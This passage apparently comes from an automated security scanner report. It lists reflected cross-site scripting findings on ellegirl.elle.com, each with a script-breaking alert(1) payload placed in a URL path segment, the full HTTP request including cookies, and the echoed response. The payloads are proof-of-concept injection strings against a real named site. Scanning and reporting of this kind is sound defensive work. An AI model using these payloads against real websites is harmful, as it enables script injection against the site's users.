Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:40:47 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:40:47 GMT
Date: Sat, 17 Sep 2011 16:40:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesiscd0f1</script><script>alert(1)</script>9187e175436/custom/images/favicon.ico';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* D
...[SNIP]...
4.166. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f381</script><script>alert(1)</script>04b92dbe51e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom8f381</script><script>alert(1)</script>04b92dbe51e/images/favicon.ico HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:41:03 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:41:04 GMT
Date: Sat, 17 Sep 2011 16:41:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom8f381</script><script>alert(1)</script>04b92dbe51e/images/favicon.ico';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT A
...[SNIP]...
4.167. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f6f</script><script>alert(1)</script>ef1ccd63310 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/imagesa4f6f</script><script>alert(1)</script>ef1ccd63310/favicon.ico HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:41:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:41:21 GMT
Date: Sat, 17 Sep 2011 16:41:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/imagesa4f6f</script><script>alert(1)</script>ef1ccd63310/favicon.ico';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER AN
...[SNIP]...
4.168. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b4a</script><script>alert(1)</script>ca3a1a3f145 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/images/favicon.icoa4b4a</script><script>alert(1)</script>ca3a1a3f145 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; __utma=216815426.1742872557.1316294793.1316294793.1316294793.1; __utmb=216815426.1.10.1316294793; __utmc=216815426; __utmz=216815426.1316294793.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:41:37 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30483
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:41:38 GMT
Date: Sat, 17 Sep 2011 16:41:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
ment.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/images/favicon.icoa4b4a</script><script>alert(1)</script>ca3a1a3f145';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHING BELOW
...[SNIP]...
4.169. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320a6</script><script>alert(1)</script>b6e4fec969e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content320a6</script><script>alert(1)</script>b6e4fec969e/themes/thesis/custom/js/custom.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:19 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30485
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:23 GMT
Date: Sat, 17 Sep 2011 16:33:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content320a6</script><script>alert(1)</script>b6e4fec969e/themes/thesis/custom/js/custom.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;


...[SNIP]...
4.170. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38315</script><script>alert(1)</script>1877df6e087 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes38315</script><script>alert(1)</script>1877df6e087/thesis/custom/js/custom.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:54 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30485
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:58 GMT
Date: Sat, 17 Sep 2011 16:34:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes38315</script><script>alert(1)</script>1877df6e087/thesis/custom/js/custom.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/******
...[SNIP]...
4.171. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c00e9</script><script>alert(1)</script>e51020febaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesisc00e9</script><script>alert(1)</script>e51020febaf/custom/js/custom.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:26 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30485
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:30 GMT
Date: Sat, 17 Sep 2011 16:36:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesisc00e9</script><script>alert(1)</script>e51020febaf/custom/js/custom.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/*************
...[SNIP]...
4.172. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908a4</script><script>alert(1)</script>9ca0791d4ab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom908a4</script><script>alert(1)</script>9ca0791d4ab/js/custom.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:57 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30485
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:38:01 GMT
Date: Sat, 17 Sep 2011 16:38:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom908a4</script><script>alert(1)</script>9ca0791d4ab/js/custom.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT
...[SNIP]...
4.173. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a53b</script><script>alert(1)</script>98124477583 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/js2a53b</script><script>alert(1)</script>98124477583/custom.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:12 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30485
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:15 GMT
Date: Sat, 17 Sep 2011 16:39:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/js2a53b</script><script>alert(1)</script>98124477583/custom.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT AL
...[SNIP]...
4.174. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/custom.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dae28</script><script>alert(1)</script>02792f79fb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/js/custom.jsdae28</script><script>alert(1)</script>02792f79fb?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:40:05 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30484
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:40:06 GMT
Date: Sat, 17 Sep 2011 16:40:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
= document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/js/custom.jsdae28</script><script>alert(1)</script>02792f79fb?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHI
...[SNIP]...
4.175. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ddd6</script><script>alert(1)</script>539d48c48ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content4ddd6</script><script>alert(1)</script>539d48c48ca/themes/thesis/custom/js/jquery.cycle.all.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:15 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30499
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:19 GMT
Date: Sat, 17 Sep 2011 16:33:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content4ddd6</script><script>alert(1)</script>539d48c48ca/themes/thesis/custom/js/jquery.cycle.all.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.loca
...[SNIP]...
4.176. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8d6c</script><script>alert(1)</script>eb7d7690424 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesf8d6c</script><script>alert(1)</script>eb7d7690424/thesis/custom/js/jquery.cycle.all.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30499
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
